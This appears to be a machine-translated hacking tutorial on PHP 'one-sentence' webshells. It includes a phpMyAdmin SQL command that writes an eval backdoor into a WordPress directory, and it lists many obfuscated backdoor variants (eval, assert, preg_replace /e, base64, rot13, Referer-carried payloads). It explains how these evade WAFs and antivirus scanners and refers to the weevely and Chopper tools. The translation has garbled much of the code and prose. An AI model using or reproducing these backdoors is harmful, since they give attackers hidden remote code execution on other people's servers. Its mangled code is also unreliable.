phpMyAdmin Write a word trojan test

Method One, a word trojan

Occasionally get a config, found to be root, and there are phpmyadmin. All right, try it.

Select ' <?php @eval ($_post[-77]);? > ' into outfile ' E:\Web\wp-content\errors.php '

The hint succeeded, but constructs the address to visit, the hint 404, appears not to be successful, should be escapes the question
Then try:

Select ' <?php @eval ($_post[-77]);? > ' into outfile ' e:\\web\\xxx.xx.vn\\wp-content\\errors.php '

Import again, prompt success, after the visit found really successful.

Another kind of a word trojan

On the server found many Trojans, but also let people wanton use ... NND

<?php @eval ($_post[' C ']);? >

The use method is also very simple, the local submission file points to the submission file, the inside of the PHP code will be executed

Hide php Ponies with 404 pages:

<! DOCTYPE HTML public '-//ietf//dtd HTML 2.0//en ' >



404 pages are commonly used in the Web site files, generally recommended that few people will go to check it to modify, at this time we can use this to hide the back door.

No feature hidden PHP Word:

<?php
session_start ();
$_post[' code '] && $_session[' thecode ' = Trim ($_post[' code '));
$_session[' Thecode ']&&preg_replace (' a\ ' eis ', ' e '. ') V '. ' A '. ' L '. ' (Base64_decode ($_session[\ ' thecode\ ')) ', ' a ');
Assign the contents of the $_post[' code ' to $_session[' Thecode ', and then execute $_session[' Thecode ', the bright spot is no signature. Use the scanning tool to check the code, it will not alarm, to achieve the purpose.
Super Covert PHP Backdoor:
<?php $_get[a] ($_get[b);? >

The Trojan is composed of a Get function only;

How to use:

? a=assert&b=${fputs%28fopen%28base64_decode%28yy5waha%29,w%29,base64_decode% 28pd9wahagqgv2ywwojf9qt1nuw2ndktsgpz4x%29%29};
After the execution of the current directory generation c.php a word trojan, when the argument for eval will be an error Trojan generation failure, for assert the same error, but will generate Trojan, really can not be belittled, simple word, is extended to such applications.

Level request, code run PHP back door:
This method is implemented in two files, file 1

<?php//1.php Header (' Content-type:text/html;charset=utf-8 ');
Parse_str ($_server[' http_referer '],  $a); if (reset ($a)  ==  '  && count ($a)  == 9)  {   eval (
Base64_decode (Str_replace (" ",  "+",  implode (Array_slice ($a,  6))));
File 2 <?php//2.php header (' Content-type:text/html;charset=utf-8 ');
The code to execute $code  = <<<code phpinfo ();
CODE;
$code  = base64_encode ($code) for Base64 coding; Constructs the Referer string $referer  =  "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=
&i= ";
Backdoor URL $url  =  ' http://localhost/test1/1.php ';
$ch  = curl_init (); $options  = array (    CURLOPT_URL =>  $url,     
Curlopt_header => false,     curlopt_returntransfer => true,
    CURLOPT_REFERER =>  $referer); Curl_setopt_array ($ch,  $options); Echo curl_exec ($ch);

The base64 code is run through the Http_referer in the HTTP request to achieve the back door effect, generally WAF to referer these tests to loosen a little, or not detect. With this idea bypass WAF good.

PHP Backdoor Generation Tool weevely

Weevely is a Webshell free software for PHP that can be used to simulate a telnet-like connection shell,weevely commonly used for Web applications, hide the back door or use a telnet-like approach instead of Web page management. Weevely generated by the server-side PHP code is Base64 encoded, so you can cheat the mainstream anti-virus software and IDs, upload server-side code can usually run directly through the weevely.

Weevely generated by the PHP backdoor using the method is now more mainstream base64 encryption combined with string deformation technology, the back door used in the function are commonly used string processing functions, as a check rule of the Eval,system and other functions will not directly appear in the code, This can cause backdoor files to bypass the Backdoor lookup tool check. Using a dark set of web backdoor killing tools to scan, the results show that there is no threat to the file.

The above is about to introduce the screenshot below, related to the use of the home is not in this introduction, simple popular science.


Three variants of a word PHP trojan

The first
<?php ($_=@$_get[2]). @$_ ($_post[1)?>
in the kitchen knife to write the Http://site/1.php?2=assert password is 1
second
. PHP
$_= "";
$_[+""]='';
$_="$_"."";
$_=($_[+""]|""). ($_[+""]|""). ($_[+""]^"");
? >
<?php ${' _ '. $_}[' _ ' (${' _ '. $_}[' __ ']);? >
Write Http://site/2.php?_=assert&__=eval ($_post[' Pass ') in the chopper. If you use the additional data of the kitchen knife to be more covert, or use other injection tools can also, because it is submitted by post.
a
third ($b 4dboy = $_post[' B4dboy ']) && @preg_replace ('/ad/e ', ' @ '. str_rot13 (' Riny '). " ($b 4dboy) ', ' Add ');

str_rot13 (' Riny ') that is encoded after the eval, completely avoid the keyword, but also without losing effect, people vomiting blood!

The last column of several advanced PHP a word trojan back door:

1,

$hh = "P". " R "." E "." G "." _"." R "." E "." P "." L "." A "." C "." E ";

$HH ("/[discuz]/e", $_post[' h '], "Access");

A kitchen knife a sentence
Words
2,
$filename =$_get[' xbid '];
Include ($filename);
Dangerous include functions that directly compile any file to run in PHP format
3,
$reg = "C". " O "." P "." Y ";
$reg ($_files[myfile][tmp_name],$_files[myfile][name]);
Rename any File
4,
$gzid = "P". " R "." E "." G "." _"." R "." E "." P "." L "." A "." C "." E ";
$gzid ("/[discuz]/e", $_post[' h '], "Access");
Chopper a Word
5, include ($UID);
Dangerous include function, directly compile any file to run in PHP format, POST www.xxx.com/index.php?uid=/home/www/bbs/image.gif
GIF inserted a sentence
6, a typical sentence
Program Backdoor Code
<?php Eval_r ($_POST[SB])?>
Program code
<?php @eval_r ($_POST[SB])?>
Fault Tolerant Code
Program code
<?php assert ($_POST[SB]);? >
Execute the related PHP statements using the Lanker one sentence client's expert mode
Program code
<?$_post[' sa '] ($_post[' SB ']);? >
Program code
<?$_post[' sa '] ($_post[' SB '],$_post[' SC ')?>
Program code
<?php
@preg_replace ("/[email]/e", $_post[' h '], "error");
?>
After using this, use a chopper a sentence the client enters in the "Configuration" column when configuring the connection
Program code
<o>h= @eval_r ($_post1);</o>
Program code
<script language= "PHP" > @eval_r ($_POST[SB]) </script>
A word that bypasses the limits
In summary, these PHP a word of the back door is spite, accidentally you certainly recruit, and we today this article of the most important in what? Focus on the bottom of the summary!